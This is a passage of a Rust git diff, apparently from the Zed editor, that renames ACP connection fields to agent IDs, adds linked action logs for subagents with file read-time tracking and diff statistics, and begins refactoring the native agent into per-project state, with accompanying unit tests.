theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{CopyButton, Tooltip, WithScrollbar, prelude::*}; use util::ResultExt as _; use workspace::{ @@ -48,7 +48,7 @@ pub struct AcpConnectionRegistry { } struct ActiveConnection { - server_name: SharedString, + agent_id: AgentId, connection: Weak, } @@ -65,12 +65,12 @@ impl AcpConnectionRegistry { pub fn set_active_connection( &self, - server_name: impl Into, + agent_id: AgentId, connection: &Rc, cx: &mut Context, ) { self.active_connection.replace(Some(ActiveConnection { - server_name: server_name.into(), + agent_id, connection: Rc::downgrade(connection), })); cx.notify(); @@ -87,7 +87,7 @@ struct AcpTools { } struct WatchedConnection { - server_name: SharedString, + agent_id: AgentId, messages: Vec, list_state: ListState, connection: Weak, @@ -144,7 +144,7 @@ impl AcpTools { }); self.watched_connection = Some(WatchedConnection { - server_name: active_connection.server_name.clone(), + agent_id: active_connection.agent_id.clone(), messages: vec![], list_state: ListState::new(0, ListAlignment::Bottom, px(2048.)), connection: active_connection.connection.clone(), @@ -291,7 +291,6 @@ impl AcpTools { v_flex() .id(index) .group("message") - .cursor_pointer() .font_buffer(cx) .w_full() .py_3() @@ -303,27 +302,29 @@ impl AcpTools { .border_color(colors.border) .border_b_1() .hover(|this| this.bg(colors.element_background.opacity(0.5))) - .on_click(cx.listener(move |this, _, _, cx| { - if this.expanded.contains(&index) { - this.expanded.remove(&index); - } else { - this.expanded.insert(index); - let Some(connection) = &mut this.watched_connection else { - return; - }; - let Some(message) = connection.messages.get_mut(index) else { - return; - }; - message.expanded(this.project.read(cx).languages().clone(), cx); - connection.list_state.scroll_to_reveal_item(index); - } - cx.notify() - })) .child( h_flex() + .id(("acp-log-message-header", index)) .w_full() .gap_2() .flex_shrink_0() + .cursor_pointer() + .on_click(cx.listener(move |this, _, _, cx| { + if this.expanded.contains(&index) { + this.expanded.remove(&index); + } else { + this.expanded.insert(index); + let Some(connection) = &mut this.watched_connection else { + return; + }; + let Some(message) = connection.messages.get_mut(index) else { + return; + }; + message.expanded(this.project.read(cx).languages().clone(), cx); + connection.list_state.scroll_to_reveal_item(index); + } + cx.notify() + })) .child(match message.direction { acp::StreamMessageDirection::Incoming => Icon::new(IconName::ArrowDown) .color(Color::Error) @@ -383,8 +384,11 @@ impl AcpTools { ) .code_block_renderer( CodeBlockRenderer::Default { - copy_button: false, - copy_button_on_hover: expanded, + copy_button_visibility: if expanded { + CopyButtonVisibility::VisibleOnHover + } else { + CopyButtonVisibility::Hidden + }, border: false, }, ), @@ -483,7 +487,7 @@ impl Item for AcpTools { "ACP: {}", self.watched_connection .as_ref() - .map_or("Disconnected", |connection| &connection.server_name) + .map_or("Disconnected", |connection| connection.agent_id.0.as_ref()) ) .into() } diff --git a/crates/action_log/Cargo.toml b/crates/action_log/Cargo.toml index 8488df691e40ea3bcfc04f4f6f74964fba7863dd..5227a61651012279e83a3b6e3e68b1484acb0f66 100644 --- a/crates/action_log/Cargo.toml +++ b/crates/action_log/Cargo.toml @@ -20,6 +20,7 @@ buffer_diff.workspace = true log.workspace = true clock.workspace = true collections.workspace = true +fs.workspace = true futures.workspace = true gpui.workspace = true language.workspace = true @@ -36,7 +37,7 @@ collections = { workspace = true, features = ["test-support"] } clock = { workspace = true, features = ["test-support"] } ctor.workspace = true gpui = { workspace = true, features = ["test-support"] } -indoc.workspace = true + language = { workspace = true, features = ["test-support"] } log.workspace = true pretty_assertions.workspace = true diff --git a/crates/action_log/src/action_log.rs b/crates/action_log/src/action_log.rs index 1157d8d6f881ecb33df8104dd4be04bd9d846b5e..1f17d38f7d2a2770350026f2f145a53723ef7481 100644 --- a/crates/action_log/src/action_log.rs +++ b/crates/action_log/src/action_log.rs @@ -1,14 +1,20 @@ use anyhow::{Context as _, Result}; use buffer_diff::BufferDiff; use clock; -use collections::BTreeMap; +use collections::{BTreeMap, HashMap}; +use fs::MTime; use futures::{FutureExt, StreamExt, channel::mpsc}; use gpui::{ App, AppContext, AsyncApp, Context, Entity, SharedString, Subscription, Task, WeakEntity, }; use language::{Anchor, Buffer, BufferEvent, Point, ToOffset, ToPoint}; use project::{Project, ProjectItem, lsp_store::OpenLspBufferHandle}; -use std::{cmp, ops::Range, sync::Arc}; +use std::{ + cmp, + ops::Range, + path::{Path, PathBuf}, + sync::Arc, +}; use text::{Edit, Patch, Rope}; use util::{RangeExt, ResultExt as _}; @@ -48,8 +54,14 @@ pub struct ActionLog { tracked_buffers: BTreeMap, TrackedBuffer>, /// The project this action log is associated with project: Entity, + /// An action log to forward all public methods to + /// Useful in cases like subagents, where we want to track individual diffs for this subagent, + /// but also want to associate the reads/writes with a parent review experience + linked_action_log: Option>, /// Stores undo information for the most recent reject operation last_reject_undo: Option, + /// Tracks the last time files were read by the agent, to detect external modifications + file_read_times: HashMap, } impl ActionLog { @@ -58,14 +70,47 @@ impl ActionLog { Self { tracked_buffers: BTreeMap::default(), project, + linked_action_log: None, last_reject_undo: None, + file_read_times: HashMap::default(), } } + pub fn with_linked_action_log(mut self, linked_action_log: Entity) -> Self { + self.linked_action_log = Some(linked_action_log); + self + } + pub fn project(&self) -> &Entity { &self.project } + pub fn file_read_time(&self, path: &Path) -> Option { + self.file_read_times.get(path).copied() + } + + fn update_file_read_time(&mut self, buffer: &Entity, cx: &App) { + let buffer = buffer.read(cx); + if let Some(file) = buffer.file() { + if let Some(local_file) = file.as_local() { + if let Some(mtime) = file.disk_state().mtime() { + let abs_path = local_file.abs_path(cx); + self.file_read_times.insert(abs_path, mtime); + } + } + } + } + + fn remove_file_read_time(&mut self, buffer: &Entity, cx: &App) { + let buffer = buffer.read(cx); + if let Some(file) = buffer.file() { + if let Some(local_file) = file.as_local() { + let abs_path = local_file.abs_path(cx); + self.file_read_times.remove(&abs_path); + } + } + } + fn track_buffer_internal( &mut self, buffer: Entity, @@ -164,7 +209,7 @@ impl ActionLog { cx: &mut Context, ) { match event { - BufferEvent::Edited => { + BufferEvent::Edited { .. } => { let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { return; }; @@ -496,16 +541,70 @@ impl ActionLog { /// Track a buffer as read by agent, so we can notify the model about user edits. pub fn buffer_read(&mut self, buffer: Entity, cx: &mut Context) { + self.buffer_read_impl(buffer, true, cx); + } + + fn buffer_read_impl( + &mut self, + buffer: Entity, + record_file_read_time: bool, + cx: &mut Context, + ) { + if let Some(linked_action_log) = &self.linked_action_log { + // We don't want to share read times since the other agent hasn't read it necessarily + linked_action_log.update(cx, |log, cx| { + log.buffer_read_impl(buffer.clone(), false, cx); + }); + } + if record_file_read_time { + self.update_file_read_time(&buffer, cx); + } self.track_buffer_internal(buffer, false, cx); } /// Mark a buffer as created by agent, so we can refresh it in the context pub fn buffer_created(&mut self, buffer: Entity, cx: &mut Context) { + self.buffer_created_impl(buffer, true, cx); + } + + fn buffer_created_impl( + &mut self, + buffer: Entity, + record_file_read_time: bool, + cx: &mut Context, + ) { + if let Some(linked_action_log) = &self.linked_action_log { + // We don't want to share read times since the other agent hasn't read it necessarily + linked_action_log.update(cx, |log, cx| { + log.buffer_created_impl(buffer.clone(), false, cx); + }); + } + if record_file_read_time { + self.update_file_read_time(&buffer, cx); + } self.track_buffer_internal(buffer, true, cx); } /// Mark a buffer as edited by agent, so we can refresh it in the context pub fn buffer_edited(&mut self, buffer: Entity, cx: &mut Context) { + self.buffer_edited_impl(buffer, true, cx); + } + + fn buffer_edited_impl( + &mut self, + buffer: Entity, + record_file_read_time: bool, + cx: &mut Context, + ) { + if let Some(linked_action_log) = &self.linked_action_log { + // We don't want to share read times since the other agent hasn't read it necessarily + linked_action_log.update(cx, |log, cx| { + log.buffer_edited_impl(buffer.clone(), false, cx); + }); + } + if record_file_read_time { + self.update_file_read_time(&buffer, cx); + } let new_version = buffer.read(cx).version(); let tracked_buffer = self.track_buffer_internal(buffer, false, cx); if let TrackedBufferStatus::Deleted = tracked_buffer.status { @@ -517,6 +616,9 @@ impl ActionLog { } pub fn will_delete_buffer(&mut self, buffer: Entity, cx: &mut Context) { + // Ok to propagate file read time removal to linked action log + self.remove_file_read_time(&buffer, cx); + let has_linked_action_log = self.linked_action_log.is_some(); let tracked_buffer = self.track_buffer_internal(buffer.clone(), false, cx); match tracked_buffer.status { TrackedBufferStatus::Created { .. } => { @@ -524,12 +626,24 @@ impl ActionLog { cx.notify(); } TrackedBufferStatus::Modified => { - buffer.update(cx, |buffer, cx| buffer.set_text("", cx)); tracked_buffer.status = TrackedBufferStatus::Deleted; - tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); + if !has_linked_action_log { + buffer.update(cx, |buffer, cx| buffer.set_text("", cx)); + tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); + } } + TrackedBufferStatus::Deleted => {} } + + if let Some(linked_action_log) = &mut self.linked_action_log { + linked_action_log.update(cx, |log, cx| log.will_delete_buffer(buffer.clone(), cx)); + } + + if has_linked_action_log && let Some(tracked_buffer) = self.tracked_buffers.get(&buffer) { + tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); + } + cx.notify(); } @@ -624,6 +738,7 @@ impl ActionLog { let task = if let Some(existing_file_content) = existing_file_content { // Capture the agent's content before restoring existing file content let agent_content = buffer.read(cx).text(); + let buffer_id = buffer.read(cx).remote_id(); buffer.update(cx, |buffer, cx| { buffer.start_transaction(); @@ -636,7 +751,10 @@ impl ActionLog { undo_info = Some(PerBufferUndo { buffer: buffer.downgrade(), - edits_to_restore: vec![(Anchor::MIN..Anchor::MAX, agent_content)], + edits_to_restore: vec![( + Anchor::min_for_buffer(buffer_id)..Anchor::max_for_buffer(buffer_id), + agent_content, + )], status: UndoBufferStatus::Created { had_existing_content: true, }, @@ -876,8 +994,8 @@ impl ActionLog { let mut valid_edits = Vec::new(); for (anchor_range, text_to_restore) in per_buffer_undo.edits_to_restore { - if anchor_range.start.buffer_id == Some(buffer.remote_id()) - && anchor_range.end.buffer_id == Some(buffer.remote_id()) + if anchor_range.start.buffer_id == buffer.remote_id() + && anchor_range.end.buffer_id == buffer.remote_id() { valid_edits.push((anchor_range, text_to_restore)); } @@ -914,13 +1032,9 @@ impl ActionLog { .collect() } - /// Returns all tracked buffers for debugging purposes - #[cfg(any(test, feature = "test-support"))] - pub fn tracked_buffers_for_debug( - &self, - _cx: &App, - ) -> impl Iterator, &TrackedBuffer)> { - self.tracked_buffers.iter() + /// Returns the total number of lines added and removed across all unreviewed buffers. + pub fn diff_stats(&self, cx: &App) -> DiffStats { + DiffStats::all_files(&self.changed_buffers(cx), cx) } /// Iterate over buffers changed since last read or edited by the model @@ -939,6 +1053,46 @@ impl ActionLog { } } +#[derive(Default, Debug, Clone, Copy)] +pub struct DiffStats { + pub lines_added: u32, + pub lines_removed: u32, +} + +impl DiffStats { + pub fn single_file(buffer: &Buffer, diff: &BufferDiff, cx: &App) -> Self { + let mut stats = DiffStats::default(); + let diff_snapshot = diff.snapshot(cx); + let buffer_snapshot = buffer.snapshot(); + let base_text = diff_snapshot.base_text(); + + for hunk in diff_snapshot.hunks(&buffer_snapshot) { + let added_rows = hunk.range.end.row.saturating_sub(hunk.range.start.row); + stats.lines_added += added_rows; + + let base_start = hunk.diff_base_byte_range.start.to_point(base_text).row; + let base_end = hunk.diff_base_byte_range.end.to_point(base_text).row; + let removed_rows = base_end.saturating_sub(base_start); + stats.lines_removed += removed_rows; + } + + stats + } + + pub fn all_files( + changed_buffers: &BTreeMap, Entity>, + cx: &App, + ) -> Self { + let mut total = DiffStats::default(); + for (buffer, diff) in changed_buffers { + let stats = DiffStats::single_file(buffer.read(cx), diff.read(cx), cx); + total.lines_added += stats.lines_added; + total.lines_removed += stats.lines_removed; + } + total + } +} + #[derive(Clone)] pub struct ActionLogTelemetry { pub agent_telemetry_id: SharedString, @@ -2634,6 +2788,515 @@ mod tests { assert!(!action_log.read_with(cx, |log, _| log.has_pending_undo())); } + #[gpui::test] + async fn test_linked_action_log_buffer_read(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "hello world"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let parent_log = cx.new(|_| ActionLog::new(project.clone())); + let child_log = + cx.new(|_| ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + }); + + // Neither log considers the buffer stale immediately after reading it. + let child_stale = cx.read(|cx| { + child_log + .read(cx) + .stale_buffers(cx) + .cloned() + .collect::>() + }); + let parent_stale = cx.read(|cx| { + parent_log + .read(cx) + .stale_buffers(cx) + .cloned() + .collect::>() + }); + assert!(child_stale.is_empty()); + assert!(parent_stale.is_empty()); + + // Simulate a user edit after the agent read the file. + cx.update(|cx| { + buffer.update(cx, |buffer, cx| { + buffer.edit([(0..5, "goodbye")], None, cx).unwrap(); + }); + }); + cx.run_until_parked(); + + // Both child and parent should see the buffer as stale because both tracked + // it at the pre-edit version via buffer_read forwarding. + let child_stale = cx.read(|cx| { + child_log + .read(cx) + .stale_buffers(cx) + .cloned() + .collect::>() + }); + let parent_stale = cx.read(|cx| { + parent_log + .read(cx) + .stale_buffers(cx) + .cloned() + .collect::>() + }); + assert_eq!(child_stale, vec![buffer.clone()]); + assert_eq!(parent_stale, vec![buffer]); + } + + #[gpui::test] + async fn test_linked_action_log_buffer_edited(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let parent_log = cx.new(|_| ActionLog::new(project.clone())); + let child_log = + cx.new(|_| ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(1, 0)..Point::new(1, 3), "DEF")], None, cx) + .unwrap(); + }); + child_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + cx.run_until_parked(); + + let expected_hunks = vec![( + buffer, + vec![HunkStatus { + range: Point::new(1, 0)..Point::new(2, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\n".into(), + }], + )]; + assert_eq!( + unreviewed_hunks(&child_log, cx), + expected_hunks, + "child should track the agent edit" + ); + assert_eq!( + unreviewed_hunks(&parent_log, cx), + expected_hunks, + "parent should also track the agent edit via linked log forwarding" + ); + } + + #[gpui::test] + async fn test_linked_action_log_buffer_created(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({})).await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let parent_log = cx.new(|_| ActionLog::new(project.clone())); + let child_log = + cx.new(|_| ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + + let file_path = project + .read_with(cx, |project, cx| { + project.find_project_path("dir/new_file", cx) + }) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| buffer.set_text("hello", cx)); + child_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + project + .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) + .await + .unwrap(); + cx.run_until_parked(); + + let expected_hunks = vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 5), + diff_status: DiffHunkStatusKind::Added, + old_text: "".into(), + }], + )]; + assert_eq!( + unreviewed_hunks(&child_log, cx), + expected_hunks, + "child should track the created file" + ); + assert_eq!( + unreviewed_hunks(&parent_log, cx), + expected_hunks, + "parent should also track the created file via linked log forwarding" + ); + } + + #[gpui::test] + async fn test_linked_action_log_will_delete_buffer(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "hello\n"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let parent_log = cx.new(|_| ActionLog::new(project.clone())); + let child_log = + cx.new(|_| ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path.clone(), cx)) + .await + .unwrap(); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.will_delete_buffer(buffer.clone(), cx)); + }); + project + .update(cx, |project, cx| project.delete_file(file_path, false, cx)) + .unwrap() + .await + .unwrap(); + cx.run_until_parked(); + + let expected_hunks = vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "hello\n".into(), + }], + )]; + assert_eq!( + unreviewed_hunks(&child_log, cx), + expected_hunks, + "child should track the deleted file" + ); + assert_eq!( + unreviewed_hunks(&parent_log, cx), + expected_hunks, + "parent should also track the deleted file via linked log forwarding" + ); + } + + /// Simulates the subagent scenario: two child logs linked to the same parent, each + /// editing a different file. The parent accumulates all edits while each child + /// only sees its own. + #[gpui::test] + async fn test_linked_action_log_independent_tracking(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({ + "file_a": "content of a", + "file_b": "content of b", + }), + ) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let parent_log = cx.new(|_| ActionLog::new(project.clone())); + let child_log_1 = + cx.new(|_| ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + let child_log_2 = + cx.new(|_| ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + + let file_a_path = project + .read_with(cx, |project, cx| { + project.find_project_path("dir/file_a", cx) + }) + .unwrap(); + let file_b_path = project + .read_with(cx, |project, cx| { + project.find_project_path("dir/file_b", cx) + }) + .unwrap(); + let buffer_a = project + .update(cx, |project, cx| project.open_buffer(file_a_path, cx)) + .await + .unwrap(); + let buffer_b = project + .update(cx, |project, cx| project.open_buffer(file_b_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + child_log_1.update(cx, |log, cx| log.buffer_read(buffer_a.clone(), cx)); + buffer_a.update(cx, |buffer, cx| { + buffer.edit([(0..0, "MODIFIED: ")], None, cx).unwrap(); + }); + child_log_1.update(cx, |log, cx| log.buffer_edited(buffer_a.clone(), cx)); + + child_log_2.update(cx, |log, cx| log.buffer_read(buffer_b.clone(), cx)); + buffer_b.update(cx, |buffer, cx| { + buffer.edit([(0..0, "MODIFIED: ")], None, cx).unwrap(); + }); + child_log_2.update(cx, |log, cx| log.buffer_edited(buffer_b.clone(), cx)); + }); + cx.run_until_parked(); + + let child_1_changed: Vec<_> = cx.read(|cx| { + child_log_1 + .read(cx) + .changed_buffers(cx) + .into_keys() + .collect() + }); + let child_2_changed: Vec<_> = cx.read(|cx| { + child_log_2 + .read(cx) + .changed_buffers(cx) + .into_keys() + .collect() + }); + let parent_changed: Vec<_> = cx.read(|cx| { + parent_log + .read(cx) + .changed_buffers(cx) + .into_keys() + .collect() + }); + + assert_eq!( + child_1_changed, + vec![buffer_a.clone()], + "child 1 should only track file_a" + ); + assert_eq!( + child_2_changed, + vec![buffer_b.clone()], + "child 2 should only track file_b" + ); + assert_eq!(parent_changed.len(), 2, "parent should track both files"); + assert!( + parent_changed.contains(&buffer_a) && parent_changed.contains(&buffer_b), + "parent should contain both buffer_a and buffer_b" + ); + } + + #[gpui::test] + async fn test_file_read_time_recorded_on_buffer_read(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "hello world"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + let abs_path = PathBuf::from(path!("/dir/file")); + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "file_read_time should be None before buffer_read" + ); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + }); + + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_some()), + "file_read_time should be recorded after buffer_read" + ); + } + + #[gpui::test] + async fn test_file_read_time_recorded_on_buffer_edited(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "hello world"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + let abs_path = PathBuf::from(path!("/dir/file")); + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "file_read_time should be None before buffer_edited" + ); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_some()), + "file_read_time should be recorded after buffer_edited" + ); + } + + #[gpui::test] + async fn test_file_read_time_recorded_on_buffer_created(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "existing content"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + let abs_path = PathBuf::from(path!("/dir/file")); + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "file_read_time should be None before buffer_created" + ); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); + }); + + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_some()), + "file_read_time should be recorded after buffer_created" + ); + } + + #[gpui::test] + async fn test_file_read_time_removed_on_delete(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "hello world"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + let abs_path = PathBuf::from(path!("/dir/file")); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + }); + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_some()), + "file_read_time should exist after buffer_read" + ); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.will_delete_buffer(buffer.clone(), cx)); + }); + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "file_read_time should be removed after will_delete_buffer" + ); + } + + #[gpui::test] + async fn test_file_read_time_not_forwarded_to_linked_action_log(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "hello world"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let parent_log = cx.new(|_| ActionLog::new(project.clone())); + let child_log = + cx.new(|_| ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + let abs_path = PathBuf::from(path!("/dir/file")); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + }); + assert!( + child_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_some()), + "child should record file_read_time on buffer_read" + ); + assert!( + parent_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "parent should NOT get file_read_time from child's buffer_read" + ); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + assert!( + parent_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "parent should NOT get file_read_time from child's buffer_edited" + ); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); + }); + assert!( + parent_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "parent should NOT get file_read_time from child's buffer_created" + ); + } + #[derive(Debug, PartialEq)] struct HunkStatus { range: Range, diff --git a/crates/activity_indicator/Cargo.toml b/crates/activity_indicator/Cargo.toml index 99ae5b5b077a14c0909737d64935220698a007c7..ce53f23365d57666e25cac434935514fc4bd7e3f 100644 --- a/crates/activity_indicator/Cargo.toml +++ b/crates/activity_indicator/Cargo.toml @@ -30,4 +30,4 @@ workspace.workspace = true [dev-dependencies] editor = { workspace = true, features = ["test-support"] } -release_channel.workspace = true + diff --git a/crates/agent/Cargo.toml b/crates/agent/Cargo.toml index 9f563cf0b1b009a496d36a6f090b0f4b476433a7..a5a4c2742a444bf2e8b0a12b0bb233c6e51684f2 100644 --- a/crates/agent/Cargo.toml +++ b/crates/agent/Cargo.toml @@ -10,7 +10,6 @@ path = "src/agent.rs" [features] test-support = ["db/test-support"] -eval = [] unit-eval = [] e2e = [] @@ -100,9 +99,9 @@ rand.workspace = true reqwest_client.workspace = true settings = { workspace = true, "features" = ["test-support"] } tempfile.workspace = true -terminal = { workspace = true, "features" = ["test-support"] } + theme = { workspace = true, "features" = ["test-support"] } -tree-sitter-rust.workspace = true + unindent = { workspace = true } -worktree = { workspace = true, "features" = ["test-support"] } + zlog.workspace = true diff --git a/crates/agent/src/agent.rs b/crates/agent/src/agent.rs index 85b943da4bb65b038100b2b842d81bc34662325d..b7aa9d1e311016f572928993e049798c2b5e3bb2 100644 --- a/crates/agent/src/agent.rs +++ b/crates/agent/src/agent.rs @@ -14,6 +14,7 @@ mod tools; use context_server::ContextServerId; pub use db::*; +use itertools::Itertools; pub use native_agent_server::NativeAgentServer; pub use pattern_extraction::*; pub use shell_command_parser::extract_commands; @@ -36,10 +37,11 @@ use futures::channel::{mpsc, oneshot}; use futures::future::Shared; use futures::{FutureExt as _, StreamExt as _, future}; use gpui::{ - App, AppContext, AsyncApp, Context, Entity, SharedString, Subscription, Task, WeakEntity, + App, AppContext, AsyncApp, Context, Entity, EntityId, SharedString, Subscription, Task, + WeakEntity, }; use language_model::{IconOrSvg, LanguageModel, LanguageModelProvider, LanguageModelRegistry}; -use project::{Project, ProjectItem, ProjectPath, Worktree}; +use project::{AgentId, Project, ProjectItem, ProjectPath, Worktree}; use prompt_store::{ ProjectContext, PromptStore, RULES_FILE_NAMES, RulesFileContext, UserRulesContext, WorktreeContext, @@ -47,9 +49,9 @@ use prompt_store::{ use serde::{Deserialize, Serialize}; use settings::{LanguageModelSelection, update_settings_file}; use std::any::Any; -use std::path::{Path, PathBuf}; +use std::path::PathBuf; use std::rc::Rc; -use std::sync::Arc; +use std::sync::{Arc, LazyLock}; use util::ResultExt; use util::path_list::PathList; use util::rel_path::RelPath; @@ -64,13 +66,23 @@ pub struct RulesLoadingError { pub message: SharedString, } +struct ProjectState { + project: Entity, + project_context: Entity, + project_context_needs_refresh: watch::Sender<()>, + _maintain_project_context: Task>, + context_server_registry: Entity, + _subscriptions: Vec, +} + /// Holds both the internal Thread and the AcpThread for a session struct Session { /// The internal thread that processes messages thread: Entity, /// The ACP thread that handles protocol communication acp_thread: Entity, - pending_save: Task<()>, + project_id: EntityId, + pending_save: Task>, _subscriptions: Vec, } @@ -234,79 +246,47 @@ pub struct NativeAgent { /// Session ID -> Session mapping sessions: HashMap, thread_store: Entity, - /// Shared project context for all threads - project_context: Entity, - project_context_needs_refresh: watch::Sender<()>, - _maintain_project_context: Task>, - context_server_registry: Entity, + /// Project-specific state keyed by project EntityId + projects: HashMap, /// Shared templates for all threads templates: Arc, /// Cached model information models: LanguageModels, - project: Entity, prompt_store: Option>, fs: Arc, _subscriptions: Vec, } impl NativeAgent { - pub async fn new( - project: Entity, + pub fn new( thread_store: Entity, templates: Arc, prompt_store: Option>, fs: Arc, - cx: &mut AsyncApp, - ) -> Result> { + cx: &mut App, + ) -> Entity { log::debug!("Creating new NativeAgent"); - let project_context = cx - .update(|cx| Self::build_project_context(&project, prompt_store.as_ref(), cx)) - .await; - - Ok(cx.new(|cx| { - let context_server_store = project.read(cx).context_server_store(); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx)); - - let mut subscriptions = vec![ - cx.subscribe(&project, Self::handle_project_event), - cx.subscribe( - &LanguageModelRegistry::global(cx), - Self::handle_models_updated_event, - ), - cx.subscribe( 